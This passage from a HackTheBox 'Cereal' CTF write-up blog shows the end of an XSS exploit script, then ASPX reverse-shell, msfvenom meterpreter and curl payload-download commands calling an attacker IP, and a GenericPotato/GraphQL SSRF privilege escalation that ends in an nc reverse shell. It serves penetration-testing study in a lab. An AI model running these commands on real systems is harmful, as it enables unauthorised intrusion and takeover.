req.setRequestHeader('Content-type', 'application/json');
req.send(payload);"""


js_payload_b64 = base64.b64encode(js_payload.encode('utf-8'))
payload = {'json': '{"title":"[XSS](javascript: eval(atob(%22' + js_payload_b64.decode('utf-8') + '%22%29%29)", "flavor":"x", "color":"#FFF", "description":"x"}'}
headers = {'Authorization': 'Bearer ' + jwt_token}


print("shending payload: " + str(payload))
r = requests.post(URL, headers=headers, json=payload, verify=False)
print(r.text)</span>
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd11.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    After that create a folder <code class="language-plaintext highlighter-rouge">www</code> and add all files inside that and then start the <code class="language-plaintext highlighter-rouge">python</code> server on port <code class="language-plaintext highlighter-rouge">80</code>.
                                </p>
                                <p>
                                    and open a <code class="language-plaintext highlighter-rouge">netcat</code> listner on port 9001 which you add on <code class="language-plaintext highlighter-rouge">shell.aspx</code>
                                </p>
                                <p>
                                    Then run the python script and wait for <code class="language-plaintext highlighter-rouge">1 min</code>
                                </p>
                                <p>
                                    As soon as you got <code class="language-plaintext highlighter-rouge">request</code> on python server run the <code class="language-plaintext highlighter-rouge">curl</code> command and get your beautiful <code class="language-plaintext highlighter-rouge">shell</code>.
                                </p>
                                <div class="language-bash highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">
1
2
3
4
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

<span class="s2">python3 -m http.server 80
nc -nvlp 9001
python3 dedsec.py
curl -k https://source.cereal.htb/uploads/shell.aspx</span>
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd12.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    Don't forget to get our <code class="language-plaintext highlighter-rouge">user.txt</code>.
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd13.png
                                        alt="cmd" />
                                </p>
                                <h2>
                                    Privilege escalation
                                </h2>
                                <p>
                                    Let's check what port are <code class="language-plaintext highlighter-rouge">listening</code>.
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd14.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    Port <code class="language-plaintext highlighter-rouge">8080</code> looks interesting because we can't see that <code class="language-plaintext highlighter-rouge">port</code> in our nmap scan.
                                </p>
                                <p>
                                    But first we need to <code class="language-plaintext highlighter-rouge">forward</code> the port because port <code class="language-plaintext highlighter-rouge">8080</code> listening on localhost.
                                </p>
                                <p>
                                    And we also see in our <strong>enumeration</strong> <code class="language-plaintext highlighter-rouge">SEImpersonation</code> is enable so we run <code class="language-plaintext highlighter-rouge">JuicyPotato</code> to <strong>privesc</strong>.
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd15.png
                                        alt="cmd" />
                                </p>
                                <p>
                                     You can use <code class="language-plaintext highlighter-rouge">chisel</code> But i an using <code class="language-plaintext highlighter-rouge">metasploit</code> for that.
                                </p>
                                <p>
                                    Let's create a <code class="language-plaintext highlighter-rouge">msfvenom</code> payload first.
                                </p>
                                <div class="language-bash highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">
1
2
3
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

<span class="nf">msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9003 -b "\x00\x0a" -a x86 --platform windows -f exe -o ded.exe
ls -al ded.exe
python3 -m http.server 80</span>
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd16.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    Let's run <code class="language-plaintext highlighter-rouge">metasploit</code> and start our <code class="language-plaintext highlighter-rouge">listner</code>.
                                </p>
                                <div class="language-bash highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">
1
2
3
4
5
6
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

<span class="nf">msfdb run
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.6
set LPORT 9003
run</span>
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd17.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    Now go back to our <code class="language-plaintext highlighter-rouge">netcat</code> rev shell and download and run the <code class="language-plaintext highlighter-rouge">ded.exe</code>.
                                </p>
                                <div class="language-bash highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">
1
2
3
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

<span class="nf">mkdir C:\temp
curl http://10.10.14.6/ded.exe -o C:\temp\ded.exe
.\temp\ded.exe</span>
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd18.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    Let's check our <code class="language-plaintext highlighter-rouge">metasploit</code> listner.
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd19.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    And we got the shell now let's <code class="language-plaintext highlighter-rouge">portforward</code> it.
                                </p>
                                <div class="language-bash highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">
1
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

<span class="nf">portfwd add -l 8081 -p 8080 -r 127.0.0.1</span>
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd20.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    Now let's run <code class="language-plaintext highlighter-rouge">nmap</code> and check what's nmap <code class="language-plaintext highlighter-rouge">tells</code> us.
                                </p>
                                <div class="language-bash highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">
1
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

<span class="nf">nmap -sC -sV -p8081 127.0.0.1</span>
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd21.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    Let's check on <code class="language-plaintext highlighter-rouge">browser</code> now.
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/web2.png
                                        alt="web" />
                                </p>
                                <p>
                                    It's a simple <code class="language-plaintext highlighter-rouge">web</code> page nothing interesting let's check the <code class="language-plaintext highlighter-rouge">source</code> code.
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/web3.png
                                        alt="web" />
                                </p>
                                <p>
                                    it uses <code class="language-plaintext highlighter-rouge">graphql</code>. Let's check the exploit or <code class="language-plaintext highlighter-rouge">article</code> on google.
                                </p>
                                <blockquote>
                                    <code class="language-plaintext highlighter-rouge">Link</code> : <a href="https://labs.bishopfox.com/tech-blog/design-considerations-for-secure-graphql-apis" target="_blank">GraphQL APIs</a>
                                </blockquote>
                                <p>
                                    After enumerating <code class="language-plaintext highlighter-rouge">graphql</code> you find a callable function which allows ssrf <code class="language-plaintext highlighter-rouge">"updatePlant"</code>. combine this ssrf with <code class="language-plaintext highlighter-rouge">SeImpersonatePrivilege</code> means juicy potato with http.
                                </p>
                                <blockquote>
                                    <code class="language-plaintext highlighter-rouge">Link</code> : <a href="https://github.com/micahvandeusen/GenericPotato" target="_blank">GenericPotato</a>
                                </blockquote>
                                <p>
                                    But you need to compile the <code class="language-plaintext highlighter-rouge">"c#"</code> code into <code class="language-plaintext highlighter-rouge">".exe"</code> file.
                                </p>
                                <p>
                                    If you don't known how to <code class="language-plaintext highlighter-rouge">compile</code> it i give you the link of <code class="language-plaintext highlighter-rouge">GenericPotato.exe</code> and <code class="language-plaintext highlighter-rouge">NtApiDotNet.xml</code> files.
                                </p>
                                <blockquote>
                                    <code class="language-plaintext highlighter-rouge">Link</code> : <a href="https://drive.google.com/file/d/1IVlGJJonN2geDQF-arTy1AAqPeJSLZys/view?usp=sharing" target="_blank">GenericPotato.exe</a>
                                </blockquote>
                                <blockquote>
                                    <code class="language-plaintext highlighter-rouge">Link</code> : <a href="https://drive.google.com/file/d/11uwMZZCc4ygLN6zkC7tbzIjHdnJIPSiF/view?usp=sharing" target="_blank">NtApiDotNet.xml</a>
                                </blockquote>
                                <blockquote>
                                    <code class="language-plaintext highlighter-rouge">Link</code> : <a href="https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post_page-----a2ddc3557403----------------------" target="_blank">nc64.exe</a>
                                </blockquote>
                                <p>
                                    Download all <code class="language-plaintext highlighter-rouge">files</code> and keep them all in one <code class="language-plaintext highlighter-rouge">directory</code> and start your python <code class="language-plaintext highlighter-rouge">server</code>.
                                </p>
                                <p>
                                    Now go back to your <code class="language-plaintext highlighter-rouge">metasploit</code> shell and get all files and then <code class="language-plaintext highlighter-rouge">execute</code> it.
                                </p>
                                <div class="language-bash highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">
1
2
3
4
5
6
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

<span class="nf">powershell
cd temp
dir
curl http://10.10.14.6/nc64.exe -o C:\temp\nc64.exe
curl http://10.10.14.6/GenericPotato.exe -o C:\temp\GenericPotato.exe
curl http://10.10.14.6/NtApiDotNet.xml -o C:\temp\NtApiDotNet.xml</span>
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd22.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    Open a netcat listner on <code class="language-plaintext highlighter-rouge">1337</code>
                                </p>
                                <p>
                                    then execute the command in <code class="language-plaintext highlighter-rouge">metasploit</code> shell
                                </p>
                                <p>
                                    Then call the function with <code class="language-plaintext highlighter-rouge">curl</code> on your local machiene.
                                </p>
                                <div class="language-bash highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">
1
2
3
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

<span class="nf">nc -nvlp 1337
.\GenericPotato.exe -p "C:\temp\nc64.exe" -a "10.10.14.6 1337 -e powershell" -e HTTP -l 8889
curl -k -X "POST" -H "Content-Type: application/json" --data-binary '{"query":"mutation{updatePlant(plantId:2, version:2.2, sourceURL:\"http://localhost:8889\")}"}' 'http://localhost:8081/api/graphql'</span>
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd23.png
                                        alt="cmd" />
                                </p>
                                <h2>
                                    Wating for rev shell as root
                                </h2>
                                <p>
                                    <img class="lozad" src=/assets/img/sample/root.gif
                                        alt="Creating Script" />
                                </p>
                                <p>
                                    And we got <code class="language-plaintext highlighter-rouge">reverse</code> shell and get our <code class="language-plaintext highlighter-rouge">root.txt</code>.
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd24.png
                                        alt="cmd" />
                                </p>





                                <p>
                                    <p>And we pwned it …….</p>
                                    <p>
                                        If u liked the writeup.Support a Student to Get the <code class="language-plaintext highlighter-rouge">OSCP-Cert</code>
                                        <a href="https://0xdedinfosec.github.io/tabs/donation/" target="_blank">Donation for OSCP</a>
                                    </p>
                                    <h1 id="resources">Resources</h1>
                                <table>
                                    <thead>
                                        <tr>
                                            <th>Topic
                                            <th>
                                                Url
                                    <tbody>
                                        <tr>
                                            <td>GitTools
                                            <td>
                                                <a href="https://github.com/internetwache/GitTools"
                                                    target="_blank">https://github.com/internetwache/GitTools</a>
                                        <tr>
                                            <td>Cross-site Scripting (XSS)
                                            <td>
                                                <a href="https://snyk.io/vuln/npm:react-marked-markdown:20180517"
                                                    target="_blank">https://snyk.io/vuln/npm:react-marked-markdown:20180517</a>
                                        <tr>
                                            <td>The JSON Web Token Toolkit v2
                                            <td>
                                                <a href="https://github.com/ticarpi/jwt_tool"
                                                    target="_blank">https://github.com/ticarpi/jwt_tool</a>
                                        <tr>
                                            <td>Shell.aspx
                                            <td>
                                                <a href="https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx"
                                                    target="_blank">https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx</a>
                                        <tr>
                                            <td>GraphQL APIs
                                            <td>
                                                <a href="https://labs.bishopfox.com/tech-blog/design-considerations-for-secure-graphql-apis"
                                                    target="_blank">https://labs.bishopfox.com/tech-blog/design-considerations-for-secure-graphql-apis</a>
                                        <tr>
                                            <td>GenericPotato
                                            <td>
                                                <a href="https://github.com/micahvandeusen/GenericPotato"
                                                    target="_blank">https://github.com/micahvandeusen/GenericPotato</a>
                                        <tr>
                                            <td>GenericPotato.exe
                                            <td>
                                                <a href="https://drive.google.com/file/d/1IVlGJJonN2geDQF-arTy1AAqPeJSLZys/view"
                                                    target="_blank">https://drive.google.com/file/d/1IVlGJJonN2geDQF-arTy1AAqPeJSLZys/view</a>
                                        <tr>
                                            <td>NtApiDotNet.xml
                                            <td>
                                                <a href="https://drive.google.com/file/d/11uwMZZCc4ygLN6zkC7tbzIjHdnJIPSiF/view"
                                                    target="_blank">https://drive.google.com/file/d/11uwMZZCc4ygLN6zkC7tbzIjHdnJIPSiF/view</a>
                                        <tr>
                                            <td>nc64.exe
                                            <td>
                                                <a href="https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post_page-----a2ddc3557403----------------------"
                                                    target="_blank">https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post_page-----a2ddc3557403</a>
                                </table>
                    </div>
                    <div class="post-tail-wrapper text-muted">
                        <div class="post-tail-bottom d-flex justify-content-between align-items-center pt-5 pb-2">
                            <div class="license-wrapper">
                                <span class="license-text ml-1 mr-1">
                                    This post is licensed under 
                                    <a href="https://creativecommons.org/licenses/by/4.0/">
                                        CC BY 4.0 <i class="fab fa-creative-commons"></i>
                                        <i class="fab fa-creative-commons-by"></i>
                                    </a>
                                </span>
                            </div>
                            <div class="share-wrapper">
                                <span class="share-label ml-1 mr-1">Share</span>
                                <span class="share-icon">
                                    <a href="#" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank">
                                        <i class="fa-fw fab fa-twitter mr-1"></i>
                                    </a>
                                    <a href="https://www.facebook.com/dedsecinfoServices/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank">
                                        <i class="fa-fw fab fa-facebook-square mr-1"></i>
                                    </a>
                                    <a href="#" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank">
                                        <i class="fa-fw fab fa-telegram mr-1"></i>
                                    </a>
                                    <i class="fa-fw fas fa-link mr-1 small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i>
                                </span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div id="panel-wrapper" class="col-xl-3 pl-2 topbar-down">
                <div class="access">
                    <div id="access-lastmod" class="post mb-4">
                        <h3 data-toc-skip>Recent Update</h3>
                        <ul class="post-content pl-0 pb-1 ml-1 mt-2">
                            <li>
                                <a href="/posts/htb-cereal/">Hackthebox Cereal writeup</a>
                            </li>
                            <li>
                                <a href="/posts/htb-delivery/">Hackthebox Delivery writeup</a>
                            </li>
                            <li>
                                <a href="/posts/htb-ready/">Hackthebox Ready writeup</a>
                            </li>
                        </ul>
                    </div>
                    <div id="access-tags">
                        <h3 data-toc-skip>Trending Tags</h3>
                        <div class="d-flex flex-wrap mt-3 mb-1 mr-3">
                            <a class="post-tag" href="/tags/cve/">CVE</a>
                            <a class="post-tag" href="/tags/linpeas/">LinPEAS</a>
                            <a class="post-tag" href="/tags/mysql-backdoor/">MySQL Backdoor</a>
                            <a class="post-tag" href="/tags/server-side-template-injection/">Server-Side Template Injection</a>
                            <a class="post-tag" href="/tags/ftp/">FTP</a>
                            <a class="post-tag" href="/tags/sireprat/">SirepRAT</a>
                            <a class="post-tag" href="/tags/jackson/">Jackson</a>
                            <a class="post-tag" href="/tags/gtfobins/">GTFO-Bins</a>
                            <a class="post-tag" href="/tags/pypi-server/">pypi-server</a>
                            <a class="post-tag" href="/tags/email-extractor/">email-extractor</a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="row">
            <div id="post-extend-wrapper" class="col-12 col-lg-11 col-xl-8">
                <div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">
                    <div class="post-navigation d-flex justify-content-between">
                        <a href="/posts/htb-jewel/" class="btn btn-outline-primary">
                            <p>Hackthebox Jewel writeup</p>
                        </a>
                        <a href="/posts/htb-reel2/" class="btn btn-outline-primary">
                            <p>Fortress Reel2 writeup</p>
                        </a>
                    </div>
                    <!-- Disqus  -->
                    <script id="dsq-count-scr" src="//0xdedinfosec.disqus.com/count.js" async></script>
                    <div id="disqus_thread"></div>
                    <script>
                    var disqus_config = function () {
                    this.page.url = 'https://0xdedinfosec.github.io/posts/htb-cereal/';  
                    this.page.identifier = '/posts/htb-cereal/';
                    };
                    (function() {
                    var d = document, s = d.createElement('script');
                    s.src = 'https://0xdedinfosec.disqus.com/embed.js';
                    s.setAttribute('data-timestamp', +new Date());
                    (d.head || d.body).appendChild(s);
                    })();
                    </script>
                    <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
                            
                    <!-- Disqus end -->
                    <div id="related-posts" class="mt-4 mb-2 mb-sm-4 pb-2">
                        <h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3>
                        <div class="card-deck mb-4">
                            <div class="card">
                                <a href="/posts/htb-jewel/">
                                    <div class="card-body">
                                        <span class="timeago small">
                                            Jan 11, 2021 <i class="unloaded">2021-01-11T00:00:00+00:00</i>
                                        </span>
                                        <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox Delivery writeup</h3>
                                        <div class="text-muted small">
                                            <p>information Column Details Name Delivery IP 10.10.10.222 Points 20 Os Linux ...</p>
                                        </div>
                                    </div>
                                </a>
                            </div>
                            <div class="card">
                                <a href="/posts/hackthebox-reel2/">
                                    <div class="card-body">
                                        <span class="timeago small">
                                            Dec 14, 2020 <i class="unloaded">2020-12-14T00:00:00+00:00</i>
                                        </span>
                                        <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox Ready writeup</h3>
                                        <div class="text-muted small">
                                            <p>information@Ready:~$ Column Details Name Ready IP 10.10.10.220 Points 30 Os linu...</p>
                                        </div>
                                    </div>
                                </a>
                            </div>
                            <div class="card">
                                <a href="/posts/htb-doctor/">
                                    <div class="card-body">
                                        <span class="timeago small">
                                            Dec 02, 2020 <i class="unloaded">2020-12-02T00:00:00+00:00</i>
                                        </span>
                                        <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox Luanne writeup</h3>
                                        <div class="text-muted small">
                                            <p>Information@Luanne:~$ Column Details Name Luanne IP 10.10.10.218 Points 20 Os ...</p>
                                        </div>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script>
        <script type="text/javascript">
            const observer = lozad();
            observer.observe();
        </script>
        <footer class="d-flex w-100 justify-content-center">
            <div class="d-flex justify-content-between align-items-center">
                <div class="footer-left">
</p></div>
<p class="mb-0">
    © 2020 <a href="https://www.facebook.com/dedsecinfoServices/">Dedinfosec</a>
    . <span data-toggle="tooltip" data-placement="top" title="The blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License.">All rights reserved.</span>
    <script>
        (function(i, s, o, g, r, a, m) {
            i['GoogleAnalyticsObject'] = r;
            i[r] = i[r] || function() {
                (i[r].q = i[r].q || []).push(arguments)
            }
            ,
            i[r].l = 1 * new Date();
            a = s.createElement(o),
            m = s.getElementsByTagName(o)[0];
            a.async = 1;
            a.src = g;
            m.parentNode.insertBefore(a, m)
        }
        )(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
        ga('create', 'G-5LG9K52X15', 'auto');
        ga('send', 'pageview');
    </script>
    <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-5LG9K52X15"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-5LG9K52X15');
</script>
<script data-name="BMC-Widget" src="https://cdnjs.buymeacoffee.com/1.0.0/widget.prod.min.js" data-id="DEDINFOSEC88" data-description="Support me on Buy me a coffee!" data-message="Like The Blog? Support Me!" data-color="#FFDD00" data-position="right" data-x_margin="18" data-y_margin="18"></script>
</footer></div>
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
    <div class="col-12 col-xl-11 post-content">
        <div id="search-hints">
            <h4 class="text-muted">Trending Tags</h4>
            <a class="post-tag" href="/tags/cve/">CVE</a>
            <a class="post-tag" href="/tags/linpeas/">LinPEAS</a>
            <a class="post-tag" href="/tags/mysql-backdoor/">MySQL Backdoor</a>
            <a class="post-tag" href="/tags/server-side-template-injection/">Server-Side Template Injection</a>
            <a class="post-tag" href="/tags/ftp/">FTP</a>
            <a class="post-tag" href="/tags/sireprat/">SirepRAT</a>
            <a class="post-tag" href="/tags/jackson/">Jackson</a>
            <a class="post-tag" href="/tags/gtfobins/">GTFO-Bins</a>
            <a class="post-tag" href="/tags/pypi-server/">pypi-server</a>
            <a class="post-tag" href="/tags/email-extractor/">email-extractor</a>
        </div>
        <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
    </div>
</div>
</div><div id="mask"></div>
<a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button">
    <i class="fas fa-angle-up"></i>
</a>
<script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js" integrity="sha256-qcLR00zq6pJk4je3MLgAri8Nn+ZumUlXgTKR2H/xCY0=" crossorigin="anonymous"></script>
<script>
    SimpleJekyllSearch({
        searchInput: document.getElementById('search-input'),
        resultsContainer: document.getElementById('search-results'),
        json: '/assets/data/search.json',
        searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://0xdedinfosec.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>',
        noResultsText: '<p class="mt-5">Oops! No result founds.</p>'
    });
</script>
</body>
</html>